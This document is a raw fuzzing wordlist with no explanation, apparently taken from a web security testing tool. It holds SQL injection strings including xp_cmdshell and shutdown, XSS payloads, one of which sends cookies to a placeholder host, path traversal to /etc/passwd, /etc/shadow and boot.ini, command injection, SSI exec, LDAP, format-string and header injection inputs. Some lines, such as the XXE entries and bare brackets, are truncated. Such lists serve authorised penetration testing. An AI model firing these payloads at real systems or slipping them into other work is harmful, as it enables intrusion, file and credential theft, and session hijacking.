]]>"
">
">
">xxxyyy
"\t"
#
#'
#'
#xA
#xA#xD
#xD
#xD#xA
$NULL
$null
%
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
%00/
%00/etc/passwd%00
%01%02%03%04%0a%0d%0aADSF
%08x
%0A/usr/bin/id
%0A/usr/bin/id%0A
%0Aid
%0Aid%0A
%0a ping -i 30 127.0.0.1 %0a
%oa ping -n 30 127.0.0.1 %0a
%0a id %0a
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a
%0d
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
%0d%0aX-Injection-Header:%20AttackValue
%20
%20$(sleep%2050)
%20'sleep%2050'
%20d
%20n
%20s
%20x
%20|
%21
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%2500
%250a
%26
%27%20or%201=1
%28
%29
%2A
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%2C
%2e%2e%2f
%3C
%3C%3F
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
%3cscript%3ealert("XSS");%3c/script%3e
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%5C
%5C/
%60
%7C
%7f
%99999999999s
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
%ff
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
%s%p%x%d
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
&
& id
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
'
'%20OR
&id
<
<
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
<!--#exec%20cmd="/usr/bin/id;-->
<>"'%;)(&+
<script>alert(document.cookie);<script>alert
<script>alert(document.cookie);
";id"
'
' (select top 1
' --
' ;
' UNION ALL SELECT
' UNION SELECT
' or ''='
' or '1'='1
' or '1'='1'--
' or 'x'='x
' or (EXISTS)
' or 0=0 #
' or 0=0 --
' or 1 in (@@version)--
' or 1=1 or ''='
' or 1=1--
' or a=a--
' or uid like '%
' or uname like '%
' or user like '%
' or userid like '%
' or username like '%
'%20or%201=1
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
'';!--"=&{()}
') or ('a'='a
'--
'; exec master..xp_cmdshell
'; exec xp_regread
'; waitfor delay '0:30:0'--
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{}
';shutdown--
'>
'>
'hi' or 'x'='x';
'or select *
'sqlattempt1
'||UTL_HTTP.REQUEST
'||Utl_Http.request('http://') from dual--
(
(')
(sqlattempt2)
)
))))))))))
*
*'
*'
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
+
+%00
,@variable
-
--
--';
--sp_password
-1
-1.0
-2
-20
-268435455
..%%35%63
..%%35c
..%25%35%63
..%255c
..%5c
..%bg%qf
..%c0%af
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
..%u2215
..%u2216
../
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../etc/shadow%00
..\
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
/
/%00/
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%2A
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
/'
/'
/,%ENV,/
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/.../.../.../.../.../
/../../../../../../../../%2A
/../../../../../../../../../../../etc/passwd%00.html
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../bin/id|
/..\../..\../..\../..\../..\../..\../boot.ini
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
//
//*
/etc/passwd
/etc/shadow
/index.html|id|
0
0 or 1=1
00
0xfffffff
1
1 or 1 in (@@version)--
1 or 1=1--
1.0
1; waitfor delay '0:30:0'--
1;SELECT%20*
1||Utl_Http.request('http://') from dual--
2
2147483647
268435455
65536
:response.write 111111
;
; ping 127.0.0.1 ;
;/usr/bin/id\n
;echo 111111
;id
;id;
;id\n
;id|
;ls -la
;system('/usr/bin/id')
;system('cat%20/etc/passwd')
;system('id')
;|/usr/bin/id|
<
< script > < / script>
SCRIPT]]>alert('XSS');/SCRIPT]]>
var n=0;while(true){n++;}]]>
<<
<<<
<
<>"'%;)(&+
]>&xxe;
]>&xxe;
]>&xxe;
]>&xxe;
SCRIPT]]>alert('XSS');/SCRIPT]]>
XSS
">
','')); phpinfo(); exit;/*
<IMG SRC="javascript:alert('XSS')">